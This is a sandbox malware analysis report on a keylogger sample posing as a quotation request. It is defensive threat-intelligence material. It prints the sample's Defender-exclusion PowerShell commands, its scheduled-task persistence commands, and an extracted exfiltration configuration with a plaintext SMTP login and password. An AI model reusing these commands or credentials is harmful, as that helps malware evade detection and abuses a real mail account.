Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe

Overview

General Information

Sample name:Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe
Analysis ID:1559184
MD5:7b5985233faf11890e9cf4c7b579983b
SHA1:cb2f20ad79ea7d8a1758ac2ae90a1c6d7f47e784
SHA256:5cce0ced936e5d9c13d6a4a8a3c149371c92236eb4c465e0e422142946509cea
Tags:exeuser-xzx
Infos:

Detection

Snake Keylogger, VIP Keylogger
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Scheduled temp file as task from temp location
Yara detected AntiVM3
Yara detected Snake Keylogger
Yara detected Telegram RAT
Yara detected VIP Keylogger
.NET source code contains potential unpacker
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses schtasks.exe or at.exe to add and modify task schedules
Uses the Telegram API (likely for C&C communication)
Yara detected Generic Downloader
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Schtasks From Env Var Folder
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe (PID: 4408 cmdline: "C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe" MD5: 7B5985233FAF11890E9CF4C7B579983B)
    • powershell.exe (PID: 5820 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 4724 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 6488 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\jnqeRRexnD.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 5452 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 1488 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • schtasks.exe (PID: 6460 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\jnqeRRexnD" /XML "C:\Users\user\AppData\Local\Temp\tmp2F66.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 5608 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • jnqeRRexnD.exe (PID: 2820 cmdline: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe MD5: 7B5985233FAF11890E9CF4C7B579983B)
    • schtasks.exe (PID: 5696 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\jnqeRRexnD" /XML "C:\Users\user\AppData\Local\Temp\tmp42C0.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 5232 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • jnqeRRexnD.exe (PID: 6448 cmdline: "C:\Users\user\AppData\Roaming\jnqeRRexnD.exe" MD5: 7B5985233FAF11890E9CF4C7B579983B)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
404 Keylogger, Snake KeyloggerSnake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger
{"Exfil Mode": "SMTP", "Email ID": "transportes@contfly.pt", "Password": "Transportes2022*", "Host": "mail.contfly.pt", "Port": "587"}
{"Exfil Mode": "SMTP", "Username": "transportes@contfly.pt", "Password": "Transportes2022*", "Host": "mail.contfly.pt", "Port": "587", "Version": "4.4"}
SourceRuleDescriptionAuthorStrings
0000000E.00000002.4514729893.0000000000435000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_VIPKeyloggerYara detected VIP KeyloggerJoe Security
    0000000E.00000002.4514729893.000000000042D000.00000040.00000400.00020000.00000000.sdmpWindows_Trojan_SnakeKeylogger_af3faa65unknownunknown
    • 0x2789:$a1: get_encryptedPassword
    • 0x2aa6:$a2: get_encryptedUsername
    • 0x2599:$a3: get_timePasswordChanged
    • 0x26a2:$a4: get_passwordField
    • 0x279f:$a5: set_encryptedPassword
    • 0x3e24:$a7: get_logins
    • 0x3d87:$a10: KeyLoggerEventArgs
    • 0x39ec:$a11: KeyLoggerEventArgsEventHandler
    00000009.00000002.4517923303.0000000002DB1000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_SnakeKeyloggerYara detected Snake KeyloggerJoe Security
      0000000E.00000002.4517414324.0000000003091000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_SnakeKeyloggerYara detected Snake KeyloggerJoe Security
        0000000E.00000002.4517414324.0000000003198000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          Click to see the 16 entries
          SourceRuleDescriptionAuthorStrings
          14.2.jnqeRRexnD.exe.400000.0.unpackJoeSecurity_VIPKeyloggerYara detected VIP KeyloggerJoe Security
            14.2.jnqeRRexnD.exe.400000.0.unpackWindows_Trojan_SnakeKeylogger_af3faa65unknownunknown
            • 0x2d989:$a1: get_encryptedPassword
            • 0x2dca6:$a2: get_encryptedUsername
            • 0x2d799:$a3: get_timePasswordChanged
            • 0x2d8a2:$a4: get_passwordField
            • 0x2d99f:$a5: set_encryptedPassword
            • 0x2f024:$a7: get_logins
            • 0x2ef87:$a10: KeyLoggerEventArgs
            • 0x2ebec:$a11: KeyLoggerEventArgsEventHandler
            14.2.jnqeRRexnD.exe.400000.0.unpackINDICATOR_SUSPICIOUS_EXE_DotNetProcHookDetects executables with potential process hoockingditekSHen
            • 0x2e57e:$s1: UnHook
            • 0x2e585:$s2: SetHook
            • 0x2e58d:$s3: CallNextHook
            • 0x2e59a:$s4: _hook
            0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.3b2f108.0.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
              0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.3b2f108.0.unpackJoeSecurity_VIPKeyloggerYara detected VIP KeyloggerJoe Security
                Click to see the 22 entries

                System Summary

                barindex
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe", ParentImage: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe, ParentProcessId: 4408, ParentProcessName: Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe", ProcessId: 5820, ProcessName: powershell.exe
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe", ParentImage: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe, ParentProcessId: 4408, ParentProcessName: Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe", ProcessId: 5820, ProcessName: powershell.exe
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\jnqeRRexnD" /XML "C:\Users\user\AppData\Local\Temp\tmp42C0.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\jnqeRRexnD" /XML "C:\Users\user\AppData\Local\Temp\tmp42C0.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe, ParentImage: C:\Users\user\AppData\Roaming\jnqeRRexnD.exe, ParentProcessId: 2820, ParentProcessName: jnqeRRexnD.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\jnqeRRexnD" /XML "C:\Users\user\AppData\Local\Temp\tmp42C0.tmp", ProcessId: 5696, ProcessName: schtasks.exe
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\jnqeRRexnD" /XML "C:\Users\user\AppData\Local\Temp\tmp2F66.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\jnqeRRexnD" /XML "C:\Users\user\AppData\Local\Temp\tmp2F66.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe", ParentImage: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe, ParentProcessId: 4408, ParentProcessName: Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\jnqeRRexnD" /XML "C:\Users\user\AppData\Local\Temp\tmp2F66.tmp", ProcessId: 6460, ProcessName: schtasks.exe
                Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe", ParentImage: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe, ParentProcessId: 4408, ParentProcessName: Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe", ProcessId: 5820, ProcessName: powershell.exe

                Persistence and Installation Behavior

                barindex
                Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\jnqeRRexnD" /XML "C:\Users\user\AppData\Local\Temp\tmp2F66.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\jnqeRRexnD" /XML "C:\Users\user\AppData\Local\Temp\tmp2F66.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe", ParentImage: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe, ParentProcessId: 4408, ParentProcessName: Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\jnqeRRexnD" /XML "C:\Users\user\AppData\Local\Temp\tmp2F66.tmp", ProcessId: 6460, ProcessName: schtasks.exe
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-11-20T09:33:07.122710+010028033053Unknown Traffic192.168.2.549710188.114.96.3443TCP
                2024-11-20T09:33:11.760095+010028033053Unknown Traffic192.168.2.549722188.114.96.3443TCP
                2024-11-20T09:33:13.280365+010028033053Unknown Traffic192.168.2.549727188.114.96.3443TCP
                2024-11-20T09:33:15.367632+010028033053Unknown Traffic192.168.2.549734188.114.96.3443TCP
                2024-11-20T09:33:15.821025+010028033053Unknown Traffic192.168.2.549735188.114.96.3443TCP
                2024-11-20T09:33:17.792972+010028033053Unknown Traffic192.168.2.549740188.114.96.3443TCP
                2024-11-20T09:33:19.152668+010028033053Unknown Traffic192.168.2.549745188.114.96.3443TCP
                2024-11-20T09:33:20.453006+010028033053Unknown Traffic192.168.2.549760188.114.96.3443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-11-20T09:33:05.413269+010028032742Potentially Bad Traffic192.168.2.549708158.101.44.24280TCP
                2024-11-20T09:33:06.616399+010028032742Potentially Bad Traffic192.168.2.549708158.101.44.24280TCP
                2024-11-20T09:33:07.803913+010028032742Potentially Bad Traffic192.168.2.549712158.101.44.24280TCP
                2024-11-20T09:33:10.225779+010028032742Potentially Bad Traffic192.168.2.549717158.101.44.24280TCP
                2024-11-20T09:33:11.194526+010028032742Potentially Bad Traffic192.168.2.549717158.101.44.24280TCP
                2024-11-20T09:33:12.382036+010028032742Potentially Bad Traffic192.168.2.549724158.101.44.24280TCP

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Source: Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeAvira: detected
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exeAvira: detection malicious, Label: HEUR/AGEN.1306899
                Source: 00000009.00000002.4517923303.0000000002DB1000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Snake Keylogger {"Exfil Mode": "SMTP", "Username": "transportes@contfly.pt", "Password": "Transportes2022*", "Host": "mail.contfly.pt", "Port": "587", "Version": "4.4"}
                Source: 0.2.Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe.3b2f108.0.unpackMalware Configuration Extractor: VIP Keylogger {"Exfil Mode": "SMTP", "Email ID": "transportes@contfly.pt", "Password": "Transportes2022*", "Host": "mail.contfly.pt", "Port": "587"}
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exeReversingLabs: Detection: 34%
                Source: Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeReversingLabs: Detection: 34%
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exeJoe Sandbox ML: detected
                Source: Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeJoe Sandbox ML: detected

                Location Tracking

                barindex
                Source: unknownDNS query: name: reallyfreegeoip.org
                Source: Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49709 version: TLS 1.0
                Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49720 version: TLS 1.0
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49737 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49767 version: TLS 1.2
                Source: Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeCode function: 4x nop then jmp 06C5B299h0_2_06C5B736
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeCode function: 4x nop then jmp 0125F45Dh9_2_0125F2C0
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeCode function: 4x nop then jmp 0125F45Dh9_2_0125F4AC
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeCode function: 4x nop then jmp 0125FC19h9_2_0125F961
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeCode function: 4x nop then jmp 05979280h9_2_05978FB0
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeCode function: 4x nop then jmp 05977EB5h9_2_05977B78
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeCode function: 4x nop then jmp 059718A1h9_2_059715F8
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeCode function: 4x nop then jmp 0597C826h9_2_0597C558
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeCode function: 4x nop then jmp 05970FF1h9_2_05970D48
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeCode function: 4x nop then jmp 0597E816h9_2_0597E548
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeCode function: 4x nop then jmp 05970741h9_2_05970498
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeCode function: 4x nop then jmp 05976733h9_2_05976488
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeCode function: 4x nop then jmp 0597BF06h9_2_0597BC38
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeCode function: 4x nop then jmp 0597DEF6h9_2_0597DC28
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeCode function: 4x nop then jmp 05973709h9_2_05973460
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeCode function: 4x nop then jmp 0597DA66h9_2_0597D798
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeCode function: 4x nop then jmp 05975A29h9_2_05975780
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeCode function: 4x nop then jmp 0597FA56h9_2_0597F788
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeCode function: 4x nop then jmp 0597BA76h9_2_0597B7A8
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeCode function: 4x nop then jmp 059779C9h9_2_05977720
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeCode function: 4x nop then jmp 05972A01h9_2_05972758
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeCode function: 4x nop then jmp 05972151h9_2_05971EA8
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeCode function: 4x nop then jmp 05975179h9_2_05974ED0
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeCode function: 4x nop then jmp 059748C9h9_2_05974620
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeCode function: 4x nop then jmp 05977119h9_2_05976E70
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeCode function: 4x nop then jmp 0597D146h9_2_0597CE78
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeCode function: 4x nop then jmp 0597F136h9_2_0597EE68
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeCode function: 4x nop then jmp 05971449h9_2_059711A0
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeCode function: 4x nop then jmp 0597ECA6h9_2_0597E9D8
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeCode function: 4x nop then jmp 0597CCB6h9_2_0597C9E8
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeCode function: 4x nop then mov esp, ebp9_2_0597B081
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeCode function: 4x nop then jmp 0597E386h9_2_0597E0B8
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeCode function: 4x nop then jmp 0597C396h9_2_0597C0C8
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeCode function: 4x nop then jmp 05970B99h9_2_059708F0
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeCode function: 4x nop then jmp 059732B1h9_2_05973008
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeCode function: 4x nop then jmp 059762D9h9_2_05976030
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeCode function: 4x nop then jmp 059702E9h9_2_05970040
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeCode function: 4x nop then jmp 05972E59h9_2_05972BB0
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeCode function: 4x nop then jmp 05975E81h9_2_05975BD8
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeCode function: 4x nop then jmp 0597B5E6h9_2_0597B318
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeCode function: 4x nop then jmp 059725A9h9_2_05972300
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeCode function: 4x nop then jmp 0597D5D6h9_2_0597D308
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeCode function: 4x nop then jmp 059755D1h9_2_05975328
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeCode function: 4x nop then jmp 05977571h9_2_059772C8
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeCode function: 4x nop then jmp 0597F5C6h9_2_0597F2F8
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeCode function: 4x nop then jmp 05976CC1h9_2_05976A18
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeCode function: 4x nop then jmp 05971CF9h9_2_05971A50
                Source: C:\Users\user\Desktop\Request for Quotation MK FMHS.RFQ.24.11.20.bat.exeCode function: 4x nop then jmp 05974D21h9_2_05974A78
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exeCode function: 4x nop then jmp 069AA4F9h11_2_069AA996
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exeCode function: 4x nop then jmp 0166F45Dh14_2_0166F2C0
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exeCode function: 4x nop then jmp 0166F45Dh14_2_0166F52F
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exeCode function: 4x nop then jmp 0166F45Dh14_2_0166F4AC
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exeCode function: 4x nop then jmp 0166FC19h14_2_0166F961
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exeCode function: 4x nop then jmp 06DB0D0Dh14_2_06DB0B30
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exeCode function: 4x nop then jmp 06DB1697h14_2_06DB0B30
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exeCode function: 4x nop then jmp 06DBFAB9h14_2_06DBF810
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exeCode function: 4x nop then jmp 06DB31E0h14_2_06DB2DC8
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exeCode function: 4x nop then jmp 06DB2C19h14_2_06DB2968
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exeCode function: 4x nop then jmp 06DBE959h14_2_06DBE6B0
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exeCode function: 4x nop then jmp 06DBE501h14_2_06DBE258
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h14_2_06DB0673
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exeCode function: 4x nop then jmp 06DBE0A9h14_2_06DBDE00
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exeCode function: 4x nop then jmp 06DBF661h14_2_06DBF3B8
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exeCode function: 4x nop then jmp 06DBF209h14_2_06DBEF60
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exeCode function: 4x nop then jmp 06DBEDB1h14_2_06DBEB08
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exeCode function: 4x nop then jmp 06DBD3A1h14_2_06DBD0F8
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exeCode function: 4x nop then jmp 06DBCF49h14_2_06DBCCA0
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h14_2_06DB0853
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h14_2_06DB0040
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exeCode function: 4x nop then jmp 06DB31E0h14_2_06DB2DC3
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exeCode function: 4x nop then jmp 06DBDC51h14_2_06DBD9A8
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exeCode function: 4x nop then jmp 06DBD7F9h14_2_06DBD550
                Source: C:\Users\user\AppData\Roaming\jnqeRRexnD.exeCode function: 4x nop then jmp 06DB31E0h14_2_06DB310E

                Networking

                barindex
                Source: unknownDNS query: name: api.telegram.org
